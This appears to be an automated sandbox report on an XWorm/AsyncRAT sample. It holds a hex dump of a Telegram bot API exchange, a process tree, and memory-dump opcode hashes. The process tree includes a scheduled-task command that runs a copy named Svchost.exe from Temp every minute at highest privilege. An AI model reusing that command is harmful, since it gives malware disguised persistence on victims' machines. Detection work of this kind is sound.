                                                                                                                                                                                                        2024-02-07 02:21:58 UTC456INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 33 31 39 30 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 37 33 31 37 33 33 39 35 37 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 69 20 72 65 61 6c 6c 79 20 68 61 74 65 20 74 68 69 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 69 72 65 61 6c 6c 79 68 61 74 65 74 68 69 73 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 32 30 33 31 30 36 30 36 32 37 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4c 75 6b 6b 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4c 75 6b 6b 79 30 35 33 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 30 37 32 37 32 35 31 37 2c 22 74 65 78 74 22 3a 22
                                                                                                                                                                                                        Data Ascii: {"ok":true,"result":{"message_id":3190,"from":{"id":6731733957,"is_bot":true,"first_name":"i really hate this","username":"ireallyhatethisbot"},"chat":{"id":2031060627,"first_name":"Lukky","username":"Lukky053","type":"private"},"date":1707272517,"text":"


                                                                                                                                                                                                        Click to jump to process

                                                                                                                                                                                                        Click to jump to process

                                                                                                                                                                                                        Click to dive into process behavior distribution

                                                                                                                                                                                                        Click to jump to process

                                                                                                                                                                                                        Target ID:0
                                                                                                                                                                                                        Start time:03:21:50
                                                                                                                                                                                                        Start date:07/02/2024
                                                                                                                                                                                                        Path:C:\Users\user\Desktop\X.exe
                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                        Commandline:C:\Users\user\Desktop\X.exe
                                                                                                                                                                                                        Imagebase:0x1f0000
                                                                                                                                                                                                        File size:36'864 bytes
                                                                                                                                                                                                        MD5 hash:F57EC853B0F01B0E9954CFBF8FEEB081
                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                        Yara matches:
                                                                                                                                                                                                        • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000000.00000000.2058996703.00000000001F2000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                                                                                                                                                        • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000000.00000000.2058996703.00000000001F2000.00000002.00000001.01000000.00000003.sdmp, Author: ditekSHen
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                        Target ID:2
                                                                                                                                                                                                        Start time:03:21:55
                                                                                                                                                                                                        Start date:07/02/2024
                                                                                                                                                                                                        Path:C:\Windows\System32\schtasks.exe
                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                        Commandline:C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Svchost" /tr "C:\Users\user\AppData\Local\Temp\Svchost.exe
                                                                                                                                                                                                        Imagebase:0x7ff68ad30000
                                                                                                                                                                                                        File size:235'008 bytes
                                                                                                                                                                                                        MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                        Reputation:moderate
                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                        Target ID:3
                                                                                                                                                                                                        Start time:03:21:55
                                                                                                                                                                                                        Start date:07/02/2024
                                                                                                                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                        Imagebase:0x7ff66e660000
                                                                                                                                                                                                        File size:862'208 bytes
                                                                                                                                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                        Reputation:high
                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                        Target ID:4
                                                                                                                                                                                                        Start time:03:21:57
                                                                                                                                                                                                        Start date:07/02/2024
                                                                                                                                                                                                        Path:C:\Users\user\AppData\Local\Temp\Svchost.exe
                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                        Commandline:C:\Users\user\AppData\Local\Temp\Svchost.exe
                                                                                                                                                                                                        Imagebase:0x520000
                                                                                                                                                                                                        File size:36'864 bytes
                                                                                                                                                                                                        MD5 hash:F57EC853B0F01B0E9954CFBF8FEEB081
                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                        Yara matches:
                                                                                                                                                                                                        • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: C:\Users\user\AppData\Local\Temp\Svchost.exe, Author: Joe Security
                                                                                                                                                                                                        • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Users\user\AppData\Local\Temp\Svchost.exe, Author: Joe Security
                                                                                                                                                                                                        • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: C:\Users\user\AppData\Local\Temp\Svchost.exe, Author: ditekSHen
                                                                                                                                                                                                        Antivirus matches:
                                                                                                                                                                                                        • Detection: 100%, Avira
                                                                                                                                                                                                        • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                                                        • Detection: 82%, ReversingLabs
                                                                                                                                                                                                        • Detection: 79%, Virustotal, Browse
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                        Target ID:5
                                                                                                                                                                                                        Start time:03:22:01
                                                                                                                                                                                                        Start date:07/02/2024
                                                                                                                                                                                                        Path:C:\Users\user\AppData\Local\Temp\Svchost.exe
                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                        Commandline:C:\Users\user\AppData\Local\Temp\Svchost.exe
                                                                                                                                                                                                        Imagebase:0x370000
                                                                                                                                                                                                        File size:36'864 bytes
                                                                                                                                                                                                        MD5 hash:F57EC853B0F01B0E9954CFBF8FEEB081
                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                        Target ID:6
                                                                                                                                                                                                        Start time:03:22:07
                                                                                                                                                                                                        Start date:07/02/2024
                                                                                                                                                                                                        Path:C:\Users\user\AppData\Local\Temp\Svchost.exe
                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                        Commandline:"C:\Users\user\AppData\Local\Temp\Svchost.exe"
                                                                                                                                                                                                        Imagebase:0xf70000
                                                                                                                                                                                                        File size:36'864 bytes
                                                                                                                                                                                                        MD5 hash:F57EC853B0F01B0E9954CFBF8FEEB081
                                                                                                                                                                                                        Has elevated privileges:false
                                                                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                        Target ID:10
                                                                                                                                                                                                        Start time:03:22:15
                                                                                                                                                                                                        Start date:07/02/2024
                                                                                                                                                                                                        Path:C:\Users\user\AppData\Local\Temp\Svchost.exe
                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                        Commandline:"C:\Users\user\AppData\Local\Temp\Svchost.exe"
                                                                                                                                                                                                        Imagebase:0x50000
                                                                                                                                                                                                        File size:36'864 bytes
                                                                                                                                                                                                        MD5 hash:F57EC853B0F01B0E9954CFBF8FEEB081
                                                                                                                                                                                                        Has elevated privileges:false
                                                                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                        Target ID:12
                                                                                                                                                                                                        Start time:03:23:00
                                                                                                                                                                                                        Start date:07/02/2024
                                                                                                                                                                                                        Path:C:\Users\user\AppData\Local\Temp\Svchost.exe
                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                        Commandline:C:\Users\user\AppData\Local\Temp\Svchost.exe
                                                                                                                                                                                                        Imagebase:0x7f0000
                                                                                                                                                                                                        File size:36'864 bytes
                                                                                                                                                                                                        MD5 hash:F57EC853B0F01B0E9954CFBF8FEEB081
                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                        Target ID:13
                                                                                                                                                                                                        Start time:03:24:00
                                                                                                                                                                                                        Start date:07/02/2024
                                                                                                                                                                                                        Path:C:\Users\user\AppData\Local\Temp\Svchost.exe
                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                        Commandline:C:\Users\user\AppData\Local\Temp\Svchost.exe
                                                                                                                                                                                                        Imagebase:0x580000
                                                                                                                                                                                                        File size:36'864 bytes
                                                                                                                                                                                                        MD5 hash:F57EC853B0F01B0E9954CFBF8FEEB081
                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                        Target ID:14
                                                                                                                                                                                                        Start time:03:25:00
                                                                                                                                                                                                        Start date:07/02/2024
                                                                                                                                                                                                        Path:C:\Users\user\AppData\Local\Temp\Svchost.exe
                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                        Commandline:C:\Users\user\AppData\Local\Temp\Svchost.exe
                                                                                                                                                                                                        Imagebase:0x600000
                                                                                                                                                                                                        File size:36'864 bytes
                                                                                                                                                                                                        MD5 hash:F57EC853B0F01B0E9954CFBF8FEEB081
                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                        Target ID:15
                                                                                                                                                                                                        Start time:03:25:04
                                                                                                                                                                                                        Start date:07/02/2024
                                                                                                                                                                                                        Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                        Commandline:C:\Windows\System32\svchost.exe -k WerSvcGroup
                                                                                                                                                                                                        Imagebase:0x7ff7403e0000
                                                                                                                                                                                                        File size:55'320 bytes
                                                                                                                                                                                                        MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                        Reputation:high
                                                                                                                                                                                                        Has exited:false

                                                                                                                                                                                                        Target ID:16
                                                                                                                                                                                                        Start time:03:25:04
                                                                                                                                                                                                        Start date:07/02/2024
                                                                                                                                                                                                        Path:C:\Windows\System32\WerFault.exe
                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                        Commandline:C:\Windows\system32\WerFault.exe -pss -s 460 -p 7096 -ip 7096
                                                                                                                                                                                                        Imagebase:0x7ff6022e0000
                                                                                                                                                                                                        File size:570'736 bytes
                                                                                                                                                                                                        MD5 hash:FD27D9F6D02763BDE32511B5DF7FF7A0
                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                        Reputation:moderate
                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                        Target ID:17
                                                                                                                                                                                                        Start time:03:25:04
                                                                                                                                                                                                        Start date:07/02/2024
                                                                                                                                                                                                        Path:C:\Windows\System32\WerFault.exe
                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                        Commandline:C:\Windows\system32\WerFault.exe -u -p 7096 -s 2972
                                                                                                                                                                                                        Imagebase:0x7ff6022e0000
                                                                                                                                                                                                        File size:570'736 bytes
                                                                                                                                                                                                        MD5 hash:FD27D9F6D02763BDE32511B5DF7FF7A0
                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                        Reputation:moderate
                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                        Target ID:18
                                                                                                                                                                                                        Start time:03:25:06
                                                                                                                                                                                                        Start date:07/02/2024
                                                                                                                                                                                                        Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                        Commandline:C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
                                                                                                                                                                                                        Imagebase:0x7ff7403e0000
                                                                                                                                                                                                        File size:55'320 bytes
                                                                                                                                                                                                        MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                        Has exited:false

                                                                                                                                                                                                        Reset < >
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.4060275653.00007FFD348B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348B0000, based on PE: false
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ffd348b0000_X.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID: SAM_^
                                                                                                                                                                                                          • API String ID: 0-3658645246
                                                                                                                                                                                                          • Opcode ID: 54789ce2186baa8c9cb26ec2b04b71bdb8f943a80f7b4c1a3d1320f4e796d297
                                                                                                                                                                                                          • Instruction ID: f1e65c301943c8eea75518a82ae2036d1d7d63fbff35dc67d45259e5fd43673e
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 54789ce2186baa8c9cb26ec2b04b71bdb8f943a80f7b4c1a3d1320f4e796d297
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9932A620B28A494FE7A4EBBC84B567977D2FF99304F540579E40EC32D2DE78AC018781
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.4060275653.00007FFD348B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348B0000, based on PE: false
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ffd348b0000_X.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                          • Opcode ID: bf3c4483de697ae4ebcb261e8694756f27e402bb91718501fbe68b3d03d0b9e8
                                                                                                                                                                                                          • Instruction ID: 4bf87d940b5a0fb768cbc86267d7d6e7188ec719f5558de828895adc9d576ddb
                                                                                                                                                                                                          • Opcode Fuzzy Hash: bf3c4483de697ae4ebcb261e8694756f27e402bb91718501fbe68b3d03d0b9e8
                                                                                                                                                                                                          • Instruction Fuzzy Hash: B9F17430608A8D8FEFA9DF28C8557E977D1FF55310F04426AE84DC7291DF78A9458B82
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.4060275653.00007FFD348B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348B0000, based on PE: false
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ffd348b0000_X.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                          • Opcode ID: f546f06ed6ca2559acc6c3b926b40d17647706800f9db9a91d971455cd472861
                                                                                                                                                                                                          • Instruction ID: 8ee66993b46ae5dc890b3996dd2693e2766897cf854ed0254840335ec6625b19
                                                                                                                                                                                                          • Opcode Fuzzy Hash: f546f06ed6ca2559acc6c3b926b40d17647706800f9db9a91d971455cd472861
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 81E1A330A08A4E8FEBA8DF28C8657E977E1FB55311F14826AD84DC7291DF78A84587C1
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.4060275653.00007FFD348B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348B0000, based on PE: false
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ffd348b0000_X.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                          • Opcode ID: a2acd4dc456e8c300b7e45a63c4c14a8ecf429e9a8fe3d75c7c3fbc748dab573
                                                                                                                                                                                                          • Instruction ID: 1d8a9be6c5c68ba409095ad77e6d22377c0cbd2a7196887a29cf7e2cce0081d7
                                                                                                                                                                                                          • Opcode Fuzzy Hash: a2acd4dc456e8c300b7e45a63c4c14a8ecf429e9a8fe3d75c7c3fbc748dab573
                                                                                                                                                                                                          • Instruction Fuzzy Hash: D8510010B0E6C90FE796A77858B5275AFD5EF87216B0800FEE0CECB1A3DD585806C382
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.4060275653.00007FFD348B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348B0000, based on PE: false
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ffd348b0000_X.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID: |L_H
                                                                                                                                                                                                          • API String ID: 0-1007238309
                                                                                                                                                                                                          • Opcode ID: 7c986efc9cd932ae4785f59ba9ef052e7bbd9f12b1cf09a803124217d2573b28
                                                                                                                                                                                                          • Instruction ID: f44b9e5533615d8503f76a4e0d94e9e665a36d43cf39c3438ff719b2c6114637
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7c986efc9cd932ae4785f59ba9ef052e7bbd9f12b1cf09a803124217d2573b28
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6E61C571B1890D4FEB98EB6C84A96FD77E1FF59310F440579E44ED3292CE68AC429780
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.4060275653.00007FFD348B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348B0000, based on PE: false
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ffd348b0000_X.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID: d
                                                                                                                                                                                                          • API String ID: 0-2564639436
                                                                                                                                                                                                          • Opcode ID: b703f538f91e4ba053b6cf979811c57a12b7af7477011c99658224ef864b5946
                                                                                                                                                                                                          • Instruction ID: da491bc4161532baa2763d3b5bc9c56e7a8e99d7e7f0754d8697a700131fe59a
                                                                                                                                                                                                          • Opcode Fuzzy Hash: b703f538f91e4ba053b6cf979811c57a12b7af7477011c99658224ef864b5946
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 95214672E0C25A0FEB41AB6858A61F97BF0EF43310F050077DA0CD7292CE6C25468BD2
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.4060275653.00007FFD348B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348B0000, based on PE: false
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ffd348b0000_X.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID: d
                                                                                                                                                                                                          • API String ID: 0-2564639436
                                                                                                                                                                                                          • Opcode ID: b1ae862216e8dad40ef1b8f214c18ea9940f121305e0642287e07a89a1f2b09b
                                                                                                                                                                                                          • Instruction ID: 5687d0a4caa71e136fef269a7b3c79877b2000a7a722127d2be5709dea4da452
                                                                                                                                                                                                          • Opcode Fuzzy Hash: b1ae862216e8dad40ef1b8f214c18ea9940f121305e0642287e07a89a1f2b09b
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9A112631E0851E4EFF94AB6884992FDB6E0EF46304F00003ADA0DE3280DE7D68409BD1
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.4060275653.00007FFD348B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348B0000, based on PE: false
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ffd348b0000_X.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID: SAM_^
                                                                                                                                                                                                          • API String ID: 0-3658645246
                                                                                                                                                                                                          • Opcode ID: 106680f66f6f41076d89c9f4b143b0cb40637140f085ddf38c03575f776a7fa6
                                                                                                                                                                                                          • Instruction ID: 47458726bef5abcf1099c86fb04d8a32a3d336b27034035b3b333cdd1a794f89
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 106680f66f6f41076d89c9f4b143b0cb40637140f085ddf38c03575f776a7fa6
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2FF04F20F1C1064FE765A77885B12BD35926F96320F984979E10DC72D6DEBCA80152C1
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.4060275653.00007FFD348B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348B0000, based on PE: false
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ffd348b0000_X.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                          • Opcode ID: 491e84ddd21a8dd43592bb48fb133243a94f4f6905b1660ffd3e80944114982c
                                                                                                                                                                                                          • Instruction ID: a6f77d4a87cecf5009f440ba4cf9213807e30ad9619d9dc992cfe7b911c2d380
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 491e84ddd21a8dd43592bb48fb133243a94f4f6905b1660ffd3e80944114982c
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 77712971B0DA4C4FEB95EB6884A96F87BE1EF4A310F4400BAE44DD72D3CD68AC419781
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.4060275653.00007FFD348B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348B0000, based on PE: false
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ffd348b0000_X.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                          • Opcode ID: 942e8d020b5d8bbc32cbbc983ea90701082b7cf19fd1c9047a84731b5fca2d3b
                                                                                                                                                                                                          • Instruction ID: 415b645f862da8a36294a084b8ed5b650ef0ee67a22c07b0686b2dade32d2c62
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 942e8d020b5d8bbc32cbbc983ea90701082b7cf19fd1c9047a84731b5fca2d3b
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 22B194207289064BF694B7EC98B67BAB2D6EF99301F640579E00DC32E3DD687C41C642
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.4060275653.00007FFD348B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348B0000, based on PE: false
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ffd348b0000_X.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                          • Opcode ID: a583a8885934dacac1633ee618fac77defe41e6649a12f260ce6e7092154330f
                                                                                                                                                                                                          • Instruction ID: bddb1b66a3d858377a1acfbb6f4c0d3b1b1f954fb6dc1e2a72f9bf1e1108d1c4
                                                                                                                                                                                                          • Opcode Fuzzy Hash: a583a8885934dacac1633ee618fac77defe41e6649a12f260ce6e7092154330f
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 17A1A4207289055FEB94B7EC94767BAB2D6EF99700F680279E00DD32D7DD68BC018792
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.4060275653.00007FFD348B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348B0000, based on PE: false
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ffd348b0000_X.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                          • Opcode ID: 0bb94ad51c90c9eb42c5969334cc3826cd2ae475bf4fa27f0ab7e79c841e8df4
                                                                                                                                                                                                          • Instruction ID: d7382bf6a7e3d92c35bfd52ea112e390a4662d8b63cac56e57274d433c6c0bbe
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0bb94ad51c90c9eb42c5969334cc3826cd2ae475bf4fa27f0ab7e79c841e8df4
                                                                                                                                                                                                          • Instruction Fuzzy Hash: C0B19630608B8D4FEB69DF28D8557E93BE1FF55310F14426AE84DC7292CE78A9458BC2
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.4060275653.00007FFD348B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348B0000, based on PE: false
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ffd348b0000_X.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                          • Opcode ID: 4b21440d994077f34ad8c26040ab99653f84d35b92acf1e1879394cfd5e41a12
                                                                                                                                                                                                          • Instruction ID: fc9194292bc581cc5056c7e44f7ee91b9a75fabedc5f03edaaaaf53cc202f7a5
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4b21440d994077f34ad8c26040ab99653f84d35b92acf1e1879394cfd5e41a12
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8A812861F0DB860FE755E77888A62A57BA1EF46310F0406FAD449C72D3DD6CA84B83D1
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.4060275653.00007FFD348B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348B0000, based on PE: false
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ffd348b0000_X.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID:
